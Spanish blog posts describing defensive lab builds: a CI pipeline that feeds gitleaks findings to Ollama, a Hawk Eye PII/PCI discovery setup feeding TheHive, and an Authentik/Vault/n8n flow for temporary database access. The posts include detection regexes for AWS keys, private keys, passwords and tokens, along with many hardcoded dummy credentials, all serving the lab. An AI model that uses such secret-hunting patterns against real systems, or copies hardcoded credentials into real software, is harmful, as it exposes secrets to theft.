Ahora que el pipeline está listo, es momento de probar qué sucede si encuentra algo. Para esto, voy a crear un archivo con contraseñas para que gitleaks lo detecte y lo pase a Ollama para el análisis.

# Crear un archivo con un secreto
cat > app/config.py << 'EOF'
# Configuración de la aplicación
import os

# NUNCA hagas esto en producción
AWS_ACCESS_KEY = "AKIAIOSFODNN7EXAMPLE"
AWS_SECRET_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
DATABASE_PASSWORD = "super_secret_password_123"

# Configuración de la base de datos
DB_CONFIG = {
    "host": "localhost",
    "port": 5432,
    "username": "admin",
    "password": "admin123456",  # Contraseña hardcodeada
    "database": "production_db"
} 
EOF

Hacemos el commit.


# Commit
git add app/config.py
git commit -m "Change with Leaks"
git push

Aquí vemos el error y el análisis de Ollama. Si todo funciona correctamente, el Job de Bandit y GitLeaks encontrará problemas, lo que hará que el Security Gate falle.

Esto activará el Webhook a N8N para que Ollama lo analice y nos notifique por Slack. Recibimos el mensaje con el análisis realizado por la LLM. Es genial para saber dónde están los errores.

Mientras tanto en Defect Dojo, tenemos una manera de visualizar los hallazgos.

Espero que hayan disfrutado del proceso y puedan implementar IA en sus entornos. Seguiremos explorando esto, añadiendo OWASP ZAP y algunas otras cosas para interactuar con Slack.

La Batalla perdida de la Clasificación de la Información, primera parte.

Santiago Fernandez — Sat, 01 Nov 2025 22:14:51 GMT

Introducción

La clasificación de datos, esa práctica noble de etiquetar documentos, bases de datos y buckets según su sensibilidad, fue pensada para dar control. Pero en la era de la nube y el desarrollo ágil, la clasificación se volvió una ilusión. Los equipos crean recursos efímeros; los pipelines generan snapshots y backups; los scripts y lambdas almacenan datos temporales. El resultado: PII y PCI dispersas en lugares que nadie revisó.

En lugar de intentar imponer una clasificación perfecta (una batalla perdida), proponemos otro enfoque: encontrar lo que importa. Descubrir automáticamente las superficies que contienen datos sensibles, priorizar por riesgo y aplicar controles proporcionalmente. Esto no solo es pragmático: es la única estrategia viable para reducir la exposición real en ambientes dinámicos.

En la prueba de concepto que desarrollé, combiné LocalStack para emular AWS S3, un contenedor MySQL y un escáner como Hawk Eye. Una manera de evidenciar archivos y tablas con PII/PCI que no figuraban en ningún inventario. A grandes rasgos, Hawk Eye realiza el descubrimiento, luego los hallazgos son clasificados, se revisa si es algo ya evidenciado o no y eso se impacta en The Hive para un seguimiento.

Arquitectura

Aca esta nuestro docker compose, todo nuestro stack.

services:
  localstack:
    image: localstack/localstack:2.2
    container_name: localstack
    environment:
      - SERVICES=s3
      - DEFAULT_REGION=us-east-1
      - DEBUG=1
    ports:
      - "4566:4566"
    volumes:
      - "./localstack_data:/tmp/localstack"
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:4566/_localstack/health"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - hawk-network

  hawk-mysql:
    image: mysql:8.0
    container_name: hawk-mysql 
    environment:
      MYSQL_ROOT_PASSWORD: rootpassword
      MYSQL_DATABASE: pocdb
    ports:
      - "3306:3306"
    volumes:
      - mysql_data:/var/lib/mysql
    healthcheck:
      test: ["CMD", "mysqladmin", "ping", "-h", "localhost", "-u", "root", "-prootpassword"]
      interval: 10s
      timeout: 5s
      retries: 5
    networks:
      - hawk-network

  cassandra:
    image: cassandra:4.1
    container_name: cassandra
    environment:
      - MAX_HEAP_SIZE=1G
      - HEAP_NEWSIZE=256M
      - CASSANDRA_CLUSTER_NAME=thehive
    volumes:
      - cassandra_data:/var/lib/cassandra
    networks:
      - hawk-network
    healthcheck:
      test: ["CMD-SHELL", "cqlsh -e 'describe cluster' || exit 1"]
      interval: 30s
      timeout: 10s
      retries: 10
      start_period: 120s

  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:7.17.9
    container_name: elasticsearch
    environment:
      - discovery.type=single-node
      - xpack.security.enabled=false
      - cluster.name=thehive
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
    volumes:
      - elasticsearch_data:/usr/share/elasticsearch/data
    networks:
      - hawk-network
    healthcheck:
      test: ["CMD-SHELL", "curl -f http://localhost:9200/_cluster/health || exit 1"]
      interval: 30s
      timeout: 10s
      retries: 5
      start_period: 60s

  thehive:
    image: strangebee/thehive:5.0
    platform: linux/amd64   
    container_name: thehive
    depends_on:
      cassandra:
        condition: service_healthy
      elasticsearch:
        condition: service_healthy
    ports:
      - "9000:9000"
    environment:
      - JVM_OPTS=-Xms1G -Xmx1G
    volumes:
      - thehive_data:/opt/thehive/data
      - ./thehive-config/application.conf:/etc/thehive/application.conf:ro
    networks:
      - hawk-network
    restart: unless-stopped
    healthcheck:
      test: ["CMD", "curl", "-f", "http://localhost:9000/api/v1/status"]
      interval: 30s
      timeout: 10s
      retries: 5
      start_period: 180s

  hawk-scanner:
    build: .
    container_name: hawk-scanner
    platform: linux/amd64
    depends_on:
      hawk-mysql:
        condition: service_healthy
      localstack:
        condition: service_healthy
      thehive:
        condition: service_started
    environment:
      - AWS_ACCESS_KEY_ID=test
      - AWS_SECRET_ACCESS_KEY=test
      - AWS_ENDPOINT_URL=http://localstack:4566
      - AWS_DEFAULT_REGION=us-east-1
      - PYTHONIOENCODING=utf-8
      - LANG=C.UTF-8
      - LC_ALL=C.UTF-8
    volumes:
      - ./alerts:/app/alerts
      - ./hawk-scanner/connection.yml:/app/connection.yml
      - ./hawk-scanner/fingerprint.yml:/app/fingerprint.yml
      - ./hawk-scanner/data:/app/data
    command: tail -f /dev/null
    networks:
      - hawk-network

networks:
  hawk-network:
    driver: bridge

volumes:
  mysql_data:
  cassandra_data:
  elasticsearch_data:
  thehive_data:

Hawk Scanner

Primero el Dockerfile para la creación del contenedor que contendrá Hawk Eye.

# Dockerfile corregido
FROM python:3.11-slim

ENV DEBIAN_FRONTEND=noninteractive \
    PYTHONUNBUFFERED=1

WORKDIR /app

# Dependencias del sistema
RUN apt-get update \
 && apt-get install -y --no-install-recommends \
    curl \
    git \
    netcat-openbsd \
    build-essential \
    libgl1 \
    libglx-mesa0 \
    libglib2.0-0 \
 && rm -rf /var/lib/apt/lists/*

# Instalar dependencias Python
COPY requirements.txt /app/requirements.txt
RUN pip install --no-cache-dir -r /app/requirements.txt

# Copiar todo el directorio del scanner
COPY hawk-scanner /app/

# Crear carpetas necesarias
RUN mkdir -p /app/alerts /app/data \
 && chmod -R a+rX /app

# WORKDIR ya es /app (donde están los archivos yml)
CMD ["python", "run_hawk_scanner.py"]

Vamos a configurar las conexiones para que Hawk Eye pueda hacer la investigación. En mi caso me propuse investigar AWS S3 y una BBDD MySQL.

# connection.yml
# Configuración de conexiones para Hawk-eye Scanner
# Este archivo define las fuentes de datos a escanear

notify:
  redacted: true  # Redactar datos sensibles en las notificaciones
  suppress_duplicates: true  # Suprimir alertas duplicadas

  # Opcional: Configurar webhook de Slack para notificaciones
  # slack:
  #   webhook_url: https://hooks.slack.com/services/YOUR/WEBHOOK/URL
  #   mention: "<@USERID>"  # Opcional: mencionar usuario/bot en alertas

sources:
  # ==========================================
  # CONFIGURACIÓN MYSQL
  # ==========================================
  mysql:
    poc_mysql:
      host: hawk-mysql
      port: 3306
      user: pocuser
      password: pocpassword
      database: pocdb
      limit_start: 0
      limit_end: 10000
      # Opcional: especificar tablas específicas
      # tables:
      #   - payments
      #   - users
      # Opcional: excluir columnas
      # exclude_columns:
      #   - id
      #   - created_at

  # ==========================================
  # CONFIGURACIÓN S3 (LOCALSTACK)
  # ==========================================
  s3:
    poc_s3:
      access_key: test
      secret_key: test
      bucket_name: poc-bucket
      endpoint_url: http://localstack:4566  # LocalStack endpoint
      cache: false
      # Opcional: patrones a excluir
      # exclude_patterns:
      #   - .log
      #   - .tmp

  # ==========================================
  # CONFIGURACIÓN FILESYSTEM (Opcional)
  # ==========================================
  # fs:
  #   local_scan:
  #     path: /app/test-data
  #     exclude_patterns:
  #       - .git
  #       - node_modules
  #       - venv
  #       - __pycache__

  # ==========================================
  # CONFIGURACIÓN REDIS (Opcional)
  # ==========================================
  # redis:
  #   poc_redis:
  #     host: redis
  #     port: 6379
  #     password: your_redis_password

  # ==========================================
  # CONFIGURACIÓN POSTGRESQL (Opcional)
  # ==========================================
  # postgresql:
  #   poc_postgres:
  #     host: postgres
  #     port: 5432
  #     user: postgres
  #     password: postgres
  #     database: testdb
  #     limit_start: 0
  #     limit_end: 1000

Y ahora lo mas importante ¿Que estamos buscando? Para ello generamos fingerprint.yml.

"Credit Card - Visa": '\b4[0-9]{12}(?:[0-9]{3})?\b'
"Credit Card - Mastercard": '\b5[1-5][0-9]{14}\b'
"Credit Card - American Express": '\b3[47][0-9]{13}\b'
"Credit Card - Discover": '\b6(?:011|5[0-9]{2})[0-9]{12}\b'
"Social Security Number (SSN)": '\b\d{3}-\d{2}-\d{4}\b'
"Email Address": '\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
"Phone Number - US": '\b(?:\+?1[-.]?)?\(?\d{3}\)?[-.\s]?\d{3}[-.\s]?\d{4}\b'
"Phone Number - International": '\b\+\d{1,3}[-.\s]?\d{1,4}[-.\s]?\d{1,4}[-.\s]?\d{1,9}\b'
"AWS Access Key": '\b(AKIA|A3T|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\b'
"AWS Secret Key": '\b[A-Za-z0-9/+=]{40}\b'
"Private Key": '-----BEGIN (RSA|DSA|EC|OPENSSH|PGP) PRIVATE KEY-----'
"Generic Password": "(?i)(password|pwd|passwd)\\s*[=:]\\s*\\S{4,}"
"API Key": "(?i)(api[_-]?key|apikey)\\s*[=:]\\s*[A-Za-z0-9_\\-]{20,}"
"JWT Token": '\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b'
"IP Address - Private": '\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2[0-9]|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})\b'
"IBAN": '\b[A-Z]{2}\d{2}[A-Z0-9]{4}\d{7}([A-Z0-9]?){0,16}\b'
"Bitcoin Address": '\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b'
"URL with Credentials": '(?i)https?://[^:]+:[^@]+@[^\s]+'

¿Qué hace?

Define 15+ patrones regex para detectar datos sensibles
Incluye: tarjetas (Visa, MC, Amex), SSN, emails, teléfonos, AWS keys, JWT, passwords, IPs, etc.Cada

Generación Datos Dummies

Vamos a crear un entorno virtual para ejecutar el generador de datos. Lo encontrarás en la carpeta data.

python3 -m venv env
source env/bin/activate
# Instalar dependencias
pip3 install -r requirements.txt
# Correr el generador
> python3 generar_datos.py
============================================================
Generando datos de prueba PCI/PII
============================================================

[1] Conectando a MySQL...
[2] Creando tabla de pagos...
[3] Insertando datos PCI (tarjetas de crédito)...
   ✓ 4 tarjetas insertadas

[4] Generando PDF con información PII...
   ✓ PDF generado

[5] Conectando a S3 (LocalStack)...
[6] Creando bucket...
   ✓ Bucket 'poc-bucket' creado
[7] Subiendo PDF con datos sensibles...
   ✓ PDF subido: s3://poc-bucket/hr/empleados_confidencial.pdf
[8] Subiendo archivo de texto con más PII...
   ✓ Archivo TXT subido: s3://poc-bucket/contacts/internal_directory.txt

============================================================
✅ DATOS DE PRUEBA GENERADOS EXITOSAMENTE
============================================================

Resumen:
  • MySQL tabla 'payments': 4 registros con tarjetas
  • S3 archivo PDF: 3 empleados con SSN y tarjetas
  • S3 archivo TXT: 3 contactos con datos sensibles

💡 Ahora ejecuta el scanner con: docker exec -it hawk-scanner python run_hawk_scanner.py

Vamos a revisar la data en MySQL

Perfecto, ahora listamos el S3 Bucket donde vemos las dos carpetas, con información, que habíamos generado.

Vamos a revisar nuestro run_hawk_scanner.py. Script orquestador que automatiza el proceso completo de escaneo de seguridad, consolidación de resultados y generación de reportes. Ahora vamos a correr nuestra Aguila. En mi caso desde el docker.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import subprocess
import json
import os
import sys
from datetime import datetime
from collections import Counter
from severity_classifier import reclassify_findings, get_critical_findings
from alert_manager import AlertManager
from thehive_integration import TheHiveIntegration

# Directorios
ALERTS_DIR = "/app/alerts"
RESULTS_DIR = "/app/alerts"

os.makedirs(ALERTS_DIR, exist_ok=True)
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")

def run_scan(source_type, output_file):
    print(f"🔍 Escaneando {source_type}...")
    cmd = [
        "hawk_scanner",
        source_type,
        "--connection", "connection.yml",
        "--fingerprint", "fingerprint.yml",
        "--json", output_file
    ]

    try:
        result = subprocess.run(cmd, capture_output=True, text=True)
        if result.returncode == 0:
            print(f"✅ {source_type} completado: {output_file}")
            return True
        else:
            print(f"❌ Error en {source_type}:")
            print(result.stderr)
            return False
    except Exception as e:
        print(f"❌ Excepción en {source_type}: {e}")
        return False

def consolidate_results(mysql_file, s3_file, output_file):
    all_results = []

    if os.path.exists(mysql_file):
        with open(mysql_file, 'r') as f:
            mysql_data = json.load(f)
            if isinstance(mysql_data, dict):
                for key, findings in mysql_data.items():
                    if isinstance(findings, list):
                        all_results.extend(findings)
            elif isinstance(mysql_data, list):
                all_results.extend(mysql_data)

    if os.path.exists(s3_file):
        with open(s3_file, 'r') as f:
            s3_data = json.load(f)
            if isinstance(s3_data, dict):
                for key, findings in s3_data.items():
                    if isinstance(findings, list):
                        all_results.extend(findings)
            elif isinstance(s3_data, list):
                all_results.extend(s3_data)

    all_results = reclassify_findings(all_results)

    with open(output_file, 'w') as f:
        json.dump(all_results, f, indent=2)

    print(f"📊 Resultados consolidados: {len(all_results)} hallazgos")
    return all_results

def display_findings(results):
    if not results:
        print("\n✅ No se detectaron hallazgos de seguridad")
        return

    print(f"\n{'='*70}")
    print(f"🔍 HALLAZGOS DETECTADOS")
    print(f"{'='*70}")

    by_severity = {}
    for r in results:
        severity = r.get('severity', 'Unknown')
        if severity not in by_severity:
            by_severity[severity] = []
        by_severity[severity].append(r)

    severity_order = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW', 'Unknown']
    severity_icons = {
        'CRITICAL': '🔴',
        'HIGH': '🟠', 
        'MEDIUM': '🟡',
        'LOW': '🟢',
        'Unknown': '⚪'
    }

    for severity in severity_order:
        if severity not in by_severity:
            continue

        findings = by_severity[severity]
        icon = severity_icons.get(severity, '⚪')

        print(f"\n{icon} {severity} - {len(findings)} hallazgos")
        print("-" * 70)

        max_display = len(findings) if severity == 'CRITICAL' else min(5, len(findings))

        for i, finding in enumerate(findings[:max_display], 1):
            print(f"\n  [{i}] {finding.get('pattern_name', 'Unknown Pattern')}")
            print(f"      Fuente: {finding.get('data_source', 'unknown')}")

            if finding.get('data_source') == 'mysql':
                print(f"      Base de datos: {finding.get('database', 'N/A')}")
                print(f"      Tabla: {finding.get('table', 'N/A')}")
                print(f"      Columna: {finding.get('column', 'N/A')}")
            elif finding.get('data_source') == 's3':
                print(f"      Bucket: {finding.get('bucket', 'N/A')}")
                print(f"      Archivo: {finding.get('file_path', 'N/A')}")

            matches = finding.get('matches', [])
            if matches:
                match_preview = matches[:3]
                print(f"      Matches: {', '.join(match_preview)}")
                if len(matches) > 3:
                    print(f"      ... y {len(matches) - 3} más")

        if len(findings) > max_display:
            print(f"\n  ... y {len(findings) - max_display} hallazgos más de severidad {severity}")

def generate_summary(results, output_file):
    valid_results = [r for r in results if isinstance(r, dict) and 'pattern_name' in r]

    summary = {
        "scan_date": datetime.now().isoformat(),
        "total_findings": len(valid_results),
        "by_severity": dict(Counter([r.get('severity', 'unknown') for r in valid_results])),
        "by_pattern": dict(Counter([r.get('pattern_name', 'unknown') for r in valid_results])),
        "by_source": dict(Counter([r.get('data_source', 'unknown') for r in valid_results])),
        "findings": valid_results
    }

    with open(output_file, 'w') as f:
        json.dump(summary, f, indent=2, default=str)

    print(f"\n{'='*70}")
    print(f"📈 RESUMEN ESTADÍSTICO")
    print(f"{'='*70}")
    print(f"   📊 Total de hallazgos: {summary['total_findings']}")

    print(f"\n   🚨 Por severidad:")
    severity_display_order = ['CRITICAL', 'HIGH', 'MEDIUM', 'LOW']
    for severity in severity_display_order:
        count = summary['by_severity'].get(severity, 0)
        if count > 0:
            print(f"      {severity}: {count}")

    print(f"\n   📁 Por fuente:")
    for source, count in summary['by_source'].items():
        print(f"      {source}: {count}")

    print(f"\n   🔍 Top 5 patrones más detectados:")
    top_patterns = sorted(summary['by_pattern'].items(), 
                         key=lambda x: x[1], reverse=True)[:5]
    for pattern, count in top_patterns:
        print(f"      {pattern}: {count}")

    critical = get_critical_findings(valid_results)
    if critical:
        print(f"\n   ⚠️  ATENCIÓN: {len(critical)} hallazgos CRÍTICOS detectados")
        print(f"      Requieren acción inmediata")

    return summary

if __name__ == "__main__":
    print("=" * 70)
    print("🦅 HAWK-EYE SCANNER - Automated Security Scan")
    print("=" * 70)

    mysql_output = f"{RESULTS_DIR}/mysql_{timestamp}.json"
    s3_output = f"{RESULTS_DIR}/s3_{timestamp}.json"
    consolidated_output = f"{RESULTS_DIR}/consolidated_{timestamp}.json"
    summary_output = f"{RESULTS_DIR}/summary_{timestamp}.json"
    latest_output = f"{RESULTS_DIR}/latest.json"

    mysql_success = run_scan("mysql", mysql_output)
    s3_success = run_scan("s3", s3_output)

    if mysql_success or s3_success:
        results = consolidate_results(mysql_output, s3_output, consolidated_output)

        # SISTEMA DE TRACKING
        print(f"\n{'='*70}")
        print("🔄 Procesando con sistema de tracking...")
        print(f"{'='*70}")

        alert_mgr = AlertManager()

        new_alerts = []
        duplicate_count = 0

        for finding in results:
            processed = alert_mgr.process_finding(finding)
            if processed['is_new']:
                new_alerts.append(processed)
            else:
                duplicate_count += 1

        print(f"\n📊 Resultados del tracking:")
        print(f"   • Total de hallazgos: {len(results)}")
        print(f"   • Alertas NUEVAS: {len(new_alerts)}")
        print(f"   • Ya vistos: {duplicate_count}")

        stats = alert_mgr.get_stats()
        if stats['critical_pending'] > 0:
            print(f"\n   ⚠️  {stats['critical_pending']} alertas CRÍTICAS pendientes")

        # INTEGRACIÓN CON THEHIVE
        thehive = TheHiveIntegration()

        if thehive.test_connection():
            print(f"\n{'='*70}")
            print("🎯 Enviando alertas críticas a TheHive...")
            print(f"{'='*70}")

            cases_created = 0
            for alert in new_alerts:
                finding = alert['finding']
                if finding.get('severity') in ['CRITICAL', 'HIGH']:
                    case_id = thehive.create_case(finding, alert['alert_hash'])
                    if case_id:
                        cases_created += 1

            print(f"\n📋 Casos creados en TheHive: {cases_created}")
            print(f"🌐 Accede al dashboard: http://localhost:9000")
        else:
            print("\n⚠️  TheHive no está disponible (casos no enviados)")

        display_findings(results)
        generate_summary(results, summary_output)

        with open(latest_output, 'w') as f:
            json.dump(results, f, indent=2)

        print(f"\n{'='*70}")
        print(f"✅ Escaneo completado exitosamente")
        print(f"📁 Resultados guardados en: {ALERTS_DIR}/")
        print(f"{'='*70}\n")
    else:
        print("\n❌ Escaneo falló")
        exit(1)

docker exec -it hawk-scanner python run_hawk_scanner.py

¡Voilà, aquí están los registros marcados por severidad!

Ahora sabemos dónde están las joyas de la corona, para poder actuar en consecuencia. Vamos un poco mas adelante e integremos The Hive para poder hacer el seguimiento.

The Hive

Es la plataforma donde llevaremos adelante el seguimiento de los hallazgos. La misma esta en http://localhost:9000.

Usuario: admin@thehive.local
Password: secret

Es importante que obtengamos una API KEY para poder integrarla.

Crear organización (si no existe):
- Haz clic en "Admin" (arriba a la derecha)
- "Organizations" → "+ New Organization"
- Nombre: hawk-security
- Haz clic en "Create"
Crear usuario con permisos:
- "Users" → "+ New User"
- Nombre: hawk-scanner
- Login: hawk-scanner@hawk-security
- Perfil: org-admin (¡importante!)
- Organización: hawk-security
- Contraseña: HawkScanner2024!
- Haz clic en "Create"
Crear API Key:
- Haz clic en el usuario hawk-scanner que acabas de crear
- Pestaña "API Keys"
- Haz clic en "+ Create API Key"
- Nombre: hawk-scanner-api
- Haz clic en "Create"
- ⚠️ COPIA LA KEY

Estos son datos dummies, yo lo cree asi.

La sumamos la API Key a thehive_integration.py, antes de ejecutar. Una vez que el Hawk Eye se ejecute, veremos en The Hive:

5 casos creados:

🔴 4 CRITICAL: Credit Cards (Visa, Mastercard, Amex, Discover)
🟠 1 HIGH: Social Security Number (SSN)

Listo, tenemos todo para darle seguimiento. Te dejo el repositorio para que puedas hacerlo en tu laboratorio.

Referencias

https://github.com/rohitcoder/hawk-eye

Optimiza la seguridad: Gestión de accesos temporales con n8n y Vault

Santiago Fernandez — Tue, 28 Oct 2025 20:14:17 GMT

Hice algo que compartí con la comunidad y me pidieron "plasmarlo en papel". Lo que quiero crear es un proceso de acceso a la base de datos de manera que tanto el usuario como el administrador se sientan satisfechos y libres de procesos complicados. Voy a hacer una breve explicación del procedimiento. Cuando un usuario inicia sesión en Authentik, que actúa como portal y está conectado a OpenLDAP, puede solicitar acceso temporal a una base de datos.
Esa solicitud se envía automáticamente a los miembros del grupo OU=SecOps para su aprobación.
Una vez aprobada, n8n recibe el evento y solicita a HashiCorp Vault la generación de credenciales dinámicas con un tiempo de vida limitado (TTL).
Vault crea de forma segura el usuario en la base de datos y devuelve las credenciales a n8n, que las entrega al solicitante.
Finalmente, todo el proceso queda registrado en un sistema de auditoría, asegurando la trazabilidad completa y la revocación automática de los accesos una vez expirado el TTL.

LDAP

A continuación, echemos un vistazo a la estructura LDAP que queremos construir. El árbol muestra la estructura jerárquica del directorio, comenzando por el DN base dc=ironbox,dc=local. Debajo de esta base hay tres departamentos (ou=IT, ou=DevOps y ou=SecOps) y varios usuarios. Esto se definirá en el siguiente paso utilizando un archivo LDIF.

Aca el .ldif

# admin user
dn: cn=admin,dc=ironbox,dc=local
changetype: add
objectClass: simpleSecurityObject
objectClass: organizationalRole
cn: admin
userPassword: adminpassword
description: LDAP Administrator

# organisational unit for IT department
dn: ou=IT,dc=ironbox,dc=local
changetype: add
objectClass: organizationalUnit
ou: IT

# user: Juan Perez for unit IT department
dn: uid=juanperez,ou=IT,dc=ironbox,dc=local
changetype: add
objectClass: inetOrgPerson
cn: Juan Perez
sn: Perez
uid: juanperez
mail: juanperez@ironbox.local
userPassword: password123

# user: Ana Rey for unit IT department
dn: uid=anna.meier,ou=IT,dc=ironbox,dc=local
changetype: add
objectClass: inetOrgPerson
cn: Ana Rey
sn: Rey
uid: ana.rey
mail: ana.rey@ironbox.local
userPassword: password456

# organisational unit for DevOps department
dn: ou=DevOps,dc=ironbox,dc=local
changetype: add
objectClass: organizationalUnit
ou: DevOps

# user: Pedro Sanchez for the  der marketing department
dn: uid=pedro.sanchez,ou=DevOps,dc=ironbox,dc=local
changetype: add
objectClass: inetOrgPerson
cn: Pedro Sanchez
sn: Sanchez
uid: pedro.sanchez
mail: pedro.sanchez@ironbox.local
userPassword: password789

# organisational unit for Information Security department
dn: ou=SecOps,dc=ironbox,dc=local
changetype: add
objectClass: organizationalUnit
ou: DevOps

# user: Santiago Fernandez for the  der marketing department
dn: uid=santiago.fernandez,ou=SecOps,dc=ironbox,dc=local
changetype: add
objectClass: inetOrgPerson
cn: Santiago Fernandez
sn: Ssantiago
uid: santiago.fernandez
mail: santiago.fernandez@ironbox.local
userPassword: Marte2000

Authentik

Authentik es una herramienta open source que sirve para gestionar usuarios, accesos y autenticaciones dentro de una organización. Podés pensarla como el “centro de control” donde definís quién puede entrar, a qué sistemas, y por cuánto tiempo.

Permite unificar el acceso a distintas aplicaciones (internas o externas) usando SSO (inicio de sesión único), autenticación multifactor (MFA) y reglas de seguridad personalizables.

A diferencia de otros sistemas cerrados como Okta o Azure AD, Authentik se puede instalar en tus propios servidores, lo que da más control y privacidad sobre los datos de tus usuarios.

Una vez que levantamos el compose vamos a obtener credeciales. Para luego ingresar a http://localhost:9000

docker exec -it authentik-server ak changepassword akadmin

Vamos a ingresar y crear la conexión con LDAP.

Los datos importantes son:

URI del servidor: ldap://openldap:389
CN de enlace: cn=admin,dc=ironbox,dc=local
Contraseña de enlace: admin
DN base: dc=ironbox,dc=local
Habilitar StartTLS: NO
Usar URI del servidor para verificación SNI: NO
Certificado de verificación TLS: (vacío)
Certificado de autenticación del cliente TLS: (vacío)
DN de usuario adicional: (VACÍO - muy importante)
DN de grupo de adición: (VACÍO - muy importante)
Filtro de objetos de usuario: (objectClass=inetOrgPerson)
Filtro de objetos de grupo: (objectClass=groupOfNames)
Campo pertenencia a grupos: member
Campo de unicidad de objetos: Uusar: entryUUID
Agregar estos Mappings:

Dejamos correr la sincronización.

¡Voilà! Ya vemos los usuarios de nuestro iDP LDAP.

Aplicación

Generación de Proxy en Proveedores.

Vamos a crear la aplicación para que ejecute el el Workflow de Credenciales.

Transporte de Notificacion

Vault

Vamos agregar los roles, usando la Base de Datos que ya tenemos. Podríamos agregar las que desearemos.

Primero habilitamos los secretos.

docker exec -e VAULT_TOKEN='root' vault vault secrets enable database

Luego configuramos la conexión con MySQL.

# Configurar la conexión
docker exec -e VAULT_TOKEN='root' vault vault write database/config/mysql-test \
    plugin_name=mysql-database-plugin \
    allowed_roles="mysql-readonly,mysql-readwrite,mysql-admin" \
    connection_url="{{username}}:{{password}}@tcp(mysql-test:3306)/testdb" \
    username="root" \
    password="rootpass123"

Ahora los roles que necesitamos, para esta Prueba.

# Crear roles
docker exec -e VAULT_TOKEN='root' vault vault write database/roles/mysql-readonly \
    db_name=mysql-test \
    creation_statements="CREATE USER '{{name}}'@'%' IDENTIFIED BY '{{password}}'; GRANT SELECT ON testdb.* TO '{{name}}'@'%';" \
    default_ttl="1h" \
    max_ttl="24h"

docker exec -e VAULT_TOKEN='root' vault vault write database/roles/mysql-readwrite \
    db_name=mysql-test \
    creation_statements="CREATE USER '{{name}}'@'%' IDENTIFIED BY '{{password}}'; GRANT SELECT, INSERT, UPDATE, DELETE ON testdb.* TO '{{name}}'@'%';" \
    default_ttl="1h" \
    max_ttl="2h"

Agregamos la politica para N8N

vault policy write n8n-policy - <<EOF
path "database/creds/*" {
  capabilities = ["read"]
}
path "sys/leases/revoke" {
  capabilities = ["update"]
}
EOF

Creamos el Token, para que N8N pueda dialogar con Vault.

vault token create -policy=n8n-policy -ttl=8760h

Auditoria

Vamos a generar un base de datos, donde guardaremos todos los pedidos.

docker exec -it mysql-test mysql -u root -prootpass123

Ejecutamos

-- Usar la base de datos (o crear una nueva)
USE testdb;

-- O crear una base de datos específica para esto:
-- CREATE DATABASE db_access_manager;
-- USE db_access_manager;

-- Crear tabla de solicitudes
CREATE TABLE IF NOT EXISTS access_requests (
  id INT AUTO_INCREMENT PRIMARY KEY,
  request_id VARCHAR(100) UNIQUE NOT NULL,
  user_email VARCHAR(255) NOT NULL,
  user_username VARCHAR(255) NOT NULL,
  user_fullname VARCHAR(255) NOT NULL,
  database_name VARCHAR(100) NOT NULL,
  database_label VARCHAR(255) NOT NULL,
  access_type VARCHAR(50) NOT NULL,
  duration VARCHAR(10) NOT NULL,
  reason TEXT NOT NULL,
  status VARCHAR(20) DEFAULT 'pending',
  requested_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
  approved_by VARCHAR(255) NULL,
  approved_at TIMESTAMP NULL,
  rejection_reason TEXT NULL,
  vault_role VARCHAR(100) NOT NULL,
  db_host VARCHAR(255) NOT NULL,
  db_port INT NOT NULL,
  db_name VARCHAR(255) NOT NULL,
  db_type VARCHAR(50) NOT NULL,
  credentials_username VARCHAR(255) NULL,
  credentials_sent BOOLEAN DEFAULT FALSE,
  INDEX idx_request_id (request_id),
  INDEX idx_status (status),
  INDEX idx_user_email (user_email),
  INDEX idx_requested_at (requested_at)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;

-- Verificar que se creó correctamente
DESCRIBE access_requests;

-- Ver las tablas
SHOW TABLES;

Agregamos las credenciales de MySQL a N8N

Workflows

Aquí están los 4 que usaremos. Ahora los revisaremos uno por uno.

El primero que se dispara es el Init DB Request Form que es llamado por Authentik. En este caso el usuario solicita el acceso, pero antes de solicitarselo a Vault es necesario que los integrantes de SecOps aprueben esta solicitud. El formulario ejecuta Get Available Databases, para saber cuales tenemos cargadas en Vault para administrar.

Al solicitar el acceso, se ejecuta Database Access Processor para el envío de correo, de modo que le llegue al equipo de SecOps.

Mientras tanto, en la Base de Datos de Auditoría, ya tenemos el registro del pedido.

Una vez que se apruebe o rechace se ejecuta Process Email Approval. Que tiene estos pasos.

Donde se verifica si el token es válido, si existe una solicitud y, según la aprobación o no por parte de SecOps, se ejecuta la aplicación de permisos. En este caso de prueba, vamos a seleccionar aprobar.

Mientras que el usuario le llega este correo, con todos los datos necesarios.

Aquí les dejo un resumen de los tiempos de ejecución.

Lógicamente, el registro de auditoría cambió de estado, incluyendo todos los datos de aprobación.

Aca el Docker Compose.

version: '3'

networks:
  ldap_network:
    driver: bridge

services:
  # PostgreSQL para Authentik
  postgresql:
    image: docker.io/library/postgres:16-alpine
    container_name: authentik-db
    restart: unless-stopped
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -d $${POSTGRES_DB} -U $${POSTGRES_USER}"]
      start_period: 20s
      interval: 30s
      retries: 5
      timeout: 5s
    volumes:
      - postgres-data:/var/lib/postgresql/data
    environment:
      POSTGRES_PASSWORD: ${PG_PASS:-admin123}
      POSTGRES_USER: ${PG_USER:-authentik}
      POSTGRES_DB: ${PG_DB:-authentik}
    networks:
      - ldap_network

  # Redis para Authentik
  redis:
    image: docker.io/library/redis:alpine
    container_name: authentik-redis
    command: --save 60 1 --loglevel warning
    restart: unless-stopped
    healthcheck:
      test: ["CMD-SHELL", "redis-cli ping | grep PONG"]
      start_period: 20s
      interval: 30s
      retries: 5
      timeout: 3s
    volumes:
      - redis-data:/data
    networks:
      - ldap_network

  # Authentik Server
